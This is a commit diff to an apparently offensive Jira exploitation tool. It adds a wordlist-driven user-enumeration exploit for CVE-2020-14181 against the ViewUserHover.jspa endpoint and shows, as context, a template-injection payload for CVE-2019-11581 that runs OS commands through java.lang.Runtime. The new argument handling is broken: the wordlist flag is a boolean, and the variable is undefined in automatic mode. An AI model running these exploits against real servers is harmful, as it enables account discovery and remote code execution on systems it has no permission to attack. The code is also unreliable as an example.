Added CVE-2020-14181

README.md

@@ -52,6 +52,7 @@ Options:
 |  CVE-2019-8449  |  LOW  |  The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.  |  2.1 - 8.3.4  |  [CVE-2019-8449](https://lmgtfy.com/?q=CVE-2019-8449)  |
 |  CVE-2019-11581  |  CRITICAL  |  Atlassian JIRA Template injection vulnerability RCE  |  Jira < 7.6.14  |  [CVE-2019-11581](https://lmgtfy.com/?q=CVE-2019-11581)  |
 |  CVE-2019-8451  |  HIGH  |  Pre-authentication server side request forgery (SSRF) vulnerability found in the /plugins/servlet/gadgets/makeRequest resource.  |  Jira == 7.6.0  && Jira.7.6.0 < 7.13.9, 8.4.0  |  [CVE-2019-8451](https://lmgtfy.com/?q=CVE-2019-8451)  |
+| CVE-2020-14181 | LOW | ffected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. | Jira < 7.13.16 && 8.0.0 < JIRA < 8.5.7 && 8.6.0 < JIRA < 8.12.0 | |
 
 Majority of the bugs stated above poses Server-Side Request Forgery (SSRF) vulnerability, where attacker can abuse a specific functionality on the server to read or update internal resources. The attacker can supply or a modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like HTTP enabled databases or perform post requests towards internal services which are not intended to be exposed.
 
@@ -99,4 +100,4 @@ Jiraffe uses `gethostbyaddr()` to get the host name corresponding to target's IP
 ## References
 
 - [RCE in Jira (CVE-2019-11581)](https://medium.com/@ruvlol/rce-in-jira-cve-2019-11581-901b845f0f)
-- [One Misconfig (JIRA) to Leak Them All - Including NASA and Hundreds of Fortune 500 Companies!](https://medium.com/@logicbomb_1/one-misconfig-jira-to-leak-them-all-including-nasa-and-hundreds-of-fortune-500-companies-a70957ef03c7)
+- [One Misconfig (JIRA) to Leak Them All - Including NASA and Hundreds of Fortune 500 Companies!](https://medium.com/@logicbomb_1/one-misconfig-jira-to-leak-them-all-including-nasa-and-hundreds-of-fortune-500-companies-a70957ef03c7)

jiraffe/__main__.py

@@ -49,12 +49,15 @@ class style():
 	optional = parser._action_groups.pop() # popped opt args
 	optional = parser.add_argument_group('Options')
 	optional.add_argument("-t", "--target", dest="target", metavar=style.CYAN("https://example-jira-instance.com") + style.RESET(''), default=False, help= style.GREEN("Target Jira Instance URL") + style.RESET(''))
+	optional.add_argument("-w", "--wordlist", dest="wordlist", action='store_true', help=style.GREEN("Path to Wordlist") + style.RESET(''))
 	optional.add_argument("-v", "--verbose", dest="verbose", action='store_true', help= style.GREEN("Verbose output") + style.RESET(''))
 	optional.add_argument("-a", "--auto", dest="automatic", action='store_true', help= style.GREEN("Automatic mode") + style.RESET(''))
 
 	verbose = parser.parse_args().verbose
 	target = parser.parse_args().target
 	auto = parser.parse_args().automatic
+	if parser.parse_args().wordlist:
+		wordlist = parser.parse_args().wordlist
 	print(style.GREEN(banner) + style.RESET(''))
 	try:
 	    if target == False:
@@ -84,6 +87,7 @@ class style():
 			cve2017_9506(target)
 			cve2019_8449(target)
 			cve2019_11581(target)
+			cve2020_14181(target, wordlist)
 	else:
 			print(style.YELLOW("[*] Mode not provided, invoking interactive mode ..."))
 			print("[*] Choose the exploit ..." + style.RESET(''))
@@ -92,7 +96,8 @@ class style():
 				'1. CVE-2017-9506 [HIGH]\n'
 				'2. CVE-2019-8449 [LOW]\n'
 				'3. CVE-2019-8451 [HIGH]\n'
-				'4. CVE-2019-11581 [CRITICAL]'
+				'4. CVE-2019-11581 [CRITICAL]\n'
+				'5. CVE-2020-14181 [LOW]'
 			)
 			print(style.GREEN(EXMSG) + style.RESET(''))
 			exploit = input(style.GREEN("    ----> ") + style.RESET('')).strip()
@@ -109,6 +114,13 @@ class style():
 					cve2019_11581(target, command)
 				else:
 					cve2019_11581(target)
+			elif exploit == '5':
+				print("[*] Input a wordlist")
+				wordlist = input("Enter the Path to the wordlist: ")
+				if wordlist:
+					cve2020_14181(target, wordlist)
+				else:
+					print(style.RED("[-] No Wordlist selected. cannot perform exploit"))
 			else:
 				print(style.RED("[-] Invalid option selected. Quitting.") + style.RESET(''))
 

jiraffe/exploits.py

@@ -2,7 +2,7 @@
 # -*- coding: utf-8 -*-
 
 from .recon import request, isjira, getversion, uparse, isaws
-import requests, os, sys
+import requests, os, sys, re
 from bs4 import BeautifulSoup
 
 if any(x in sys.platform.lower() for x in ['linux', 'linux2', 'win32']): # hotfix/issue#5
@@ -211,4 +211,17 @@ def cve2019_11581(target, command='calc'): # default windows payload
 		payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('%s').waitFor()" % command
 		params = (('from','JIRA@JIRA.com'),('subject',payload),('details',payload),('atl_token',token),('Send','Send'))
 		final = sess.post(target, headers=headers, data=params, verify=False)
-		print("[+] SUCCESS:", final, sep="\n")
+		print("[+] SUCCESS:", final, sep="\n")
+
+#CVE-2020-14181
+def cve2020_14181(target, wordlist):
+	print(style.YELLOW("[*] Launching CVE-2020-14181 Exploit...") + style.RESET(''))
+	target = target + "/secure/ViewUserHover.jspa?username="
+	f = open(wordlist, "r")
+	for username in f:
+		r = requests.get(target + username.strip('\n'))
+		pattern = re.compile('<a id="avatar-full-name-link" title=".*" href=".*\n(.*)')
+		test = pattern.findall(r.text)
+		if test:
+			print(test.pop().lstrip() + ":" + username.strip('\n'), file=sys.stderr)
+	print(style.GREEN("[*] Exploit Completed") + style.RESET(''))

requirements.txt

@@ -1,3 +1,4 @@
-requests==2.20.0
+requests==2.31.0
 beautifulsoup4==4.6.0
 packaging==19.0
+urllib3>=1.26.18 # not directly required, pinned by Snyk to avoid a vulnerability